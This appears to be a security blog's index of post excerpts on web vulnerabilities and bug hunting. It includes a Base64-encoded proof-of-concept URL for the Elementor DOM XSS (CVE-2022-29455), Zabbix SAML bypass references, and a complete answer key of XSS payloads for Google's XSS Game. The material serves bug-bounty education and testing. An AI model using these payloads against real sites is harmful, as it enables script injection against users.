– The DOM-based Reflected Cross-Site Scripting (XSS) vulnerability is in Elementor’s Elementor Website Builder plugin <= 3.5.5 versions. This issue leads to: CVE 2022-29455 4websecurity.com already reported the vulnerability to tens of thousands websites that are using WordPress and this version of the plugin. Reference: – https://nvd.nist.gov/vuln/detail/CVE-2022-29455 – https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor – https://www.rotem-bar.com/elementor * POC (Proof Of Concept): The payload is Base64 encoded: https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0= Decoded from Base64: https://example.com/#elementor-action:action=lightbox&settings={“type”:”video”,”url”:”http://”,”videoType”:”hosted”,”videoParams”:{“onerror”:”alert(document.domain)”}} Impact: XSS can cause…
Zabbix – SAML SSO Authentication Bypass
In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Dork: usage refrences https://nvd.nist.gov/vuln/detail/CVE-2022-23131 https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage https://github.com/Mr-xn/cve-2022-23131 https://github.com/projectdiscovery/nuclei-templates
The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and what not
You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and can fetch the endpoints from web applications to do further exploitation, don’t believe me xD You will after Travelling from TheTimeMachine, PS Doesn’t work offline you need internet…
Ultimate XSS Polyglot
The Most used Chrome Extensions are Used For Penetration Testing.
Mostly, penetration testing can use the extensions for the purpose to locate the broken links and inform the client, and these extensions also help to determine whether a target website contains vulnerabilities that can lead to adversarial exploitations and sensitive information theft. Here are the different chrome extensions that are used by penetration testing…. Wappalyzer…
How I Found My First Bug Reflected Xss On PIA.GOV.PH(Philippine Information Agency)
Hi guys ,This is Neil Harvey Miñano a Newbie security researcher from Philippine.This is my 1st write-up and also I am not good at XSS so forgive all mistakes.It was 04/20/2021 and my 1st day of bug hunting.I’m still newbie!Today I am gonna to Share a Reflected Xss vulnerability what was reported by me to…
eG Manager v7.1.2: Improper Access Control lead to Remote Code Execution (CVE-2020-8591)
Improper Access Control to Remote Code Execution (CVE-2020-8591)
In this post. I will explain how I hacked a whole system by exploiting improper access control vulnerability in the popular java-based MaaS software “eG Manager” and how I can escalated it to execute code remotely.
Impact
The Improper Access Control weakness describes a case where software fails to restrict access to an object properly. A malicious user can compromise security of the software and perform certain unauthorized actions by gaining elevated privileges, reading otherwise restricted information, executing commands, bypassing implemented security mechanisms, etc.
Interview With Open Bug Bounty
Speaking with the team at Open Bug Bounty was the highlight of her day for Aviva Zacks of Safety Detectives. She learned that their community-driven spirit is exactly what advantageously differentiates their project from the others out there.
https://www.safetydetectives.com/blog/interview-open-bug-bounty/
Google XSS Game
Level #1: Hello, world of XSS
https://xss-game.appspot.com/level1
Solution: <script>alert('xss')</script>
hint: inspect the source code of the page
Level #2: Persistence is key
https://xss-game.appspot.com/level2
Solution: <img src=x onerror=alert('XSS')>
hint: “welcome” post contains HTML
Level #3: That sinking feeling…
https://xss-game.appspot.com/level3/frame#1
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>
Level #4: Context matters
https://xss-game.appspot.com/level4/frame
Solution: timer=');alert('xss
Level #5: Breaking protocol
https://xss-game.appspot.com/level5/frame
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')
Level #6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
Testing for XSS (Cross Site Scripting)
Hi, So today ill tell some techniques of testing XSS, First of all these important things you should note: Copy pasting XSS payloads doesn’t work PoC or GTFO Its said like report checkers need a proper PoC for validation of the report, If doesn’t, Your report cannot be triaged. So first, For testing XSS you…